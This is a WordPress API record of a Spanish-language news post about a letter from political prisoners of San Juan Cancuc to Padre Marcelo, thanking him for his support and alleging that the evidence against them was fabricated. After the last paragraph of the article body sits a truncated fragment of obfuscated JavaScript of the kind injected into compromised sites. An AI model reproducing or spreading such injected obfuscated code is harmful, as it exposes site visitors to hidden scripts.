{"id":16478,"date":"2024-07-03T03:27:56","date_gmt":"2024-07-03T03:27:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16478"},"modified":"2024-07-03T03:27:57","modified_gmt":"2024-07-03T03:27:57","slug":"presos-politicos-envian-carta-al-padre-marcelo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16478","title":{"rendered":"Presos pol\u00edticos env\u00edan carta al Padre Marcelo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"486\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240702-WA0023-486x1024.jpg\" alt=\"\" class=\"wp-image-16479\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240702-WA0023-486x1024.jpg 486w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240702-WA0023-143x300.jpg 143w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240702-WA0023.jpg 608w\" sizes=\"auto, (max-width: 486px) 100vw, 486px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>2 de julio del 2024. San Crist\u00f3bal de Las Casas.- En una carta dirigida al Padre Marcelo, los presos pol\u00edticos de San Juan Cancuc, quienes llevan m\u00e1s de dos a\u00f1os detenidos en el Centro Estatal de Reinserci\u00f3n Social (Cereso), claman por justicia y agradecen el apoyo recibido.<\/p>\n\n\n\n<p>Los firmantes de la misiva, Agust\u00edn P\u00e9rez Dom\u00ednguez, Juan Velasco Aguilar, Agust\u00edn P\u00e9rez Velasco y Mart\u00edn P\u00e9rez Dom\u00ednguez, afirman estar pagando por un delito que no cometieron y denuncian que las pruebas en su contra fueron fabricadas.<\/p>\n\n\n\n<p>En el escrito resalta el sufrimiento que esta situaci\u00f3n ha causado a sus familias e hijos, subrayando la injusticia de su encarcelamiento.<\/p>\n\n\n\n<p>&#8220;Agradecemos much\u00edsimo en nombre del Se\u00f1or Nuestro Jesucristo por la difusi\u00f3n que realizaste&#8221;, escriben, dirigi\u00e9ndose al Padre Marcelo.<\/p>\n\n\n\n<p>Adem\u00e1s, extienden su agradecimiento a todos los pueblos creyentes que han mostrado su apoyo, y los invitan a continuar con la lucha y la oraci\u00f3n.<\/p>\n\n\n\n<p>La carta concluye con un llamado a la solidaridad y a no desanimarse en la b\u00fasqueda de justicia, reafirmando su fe y determinaci\u00f3n de seguir adelante.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 2 de julio del 2024. San Crist\u00f3bal de Las Casas.- En una carta dirigida al Padre Marcelo, los presos pol\u00edticos de San Juan Cancuc, quienes llevan m\u00e1s de dos a\u00f1os detenidos en el Centro Estatal de Reinserci\u00f3n Social (Cereso), claman por justicia y agradecen el apoyo recibido. Los firmantes de la misiva, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16479,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16478","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16478","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16478"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16478\/revisions"}],"predecessor-version":[{"id":16480,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16478\/revisions\/16480"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16479"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16478"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16478"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}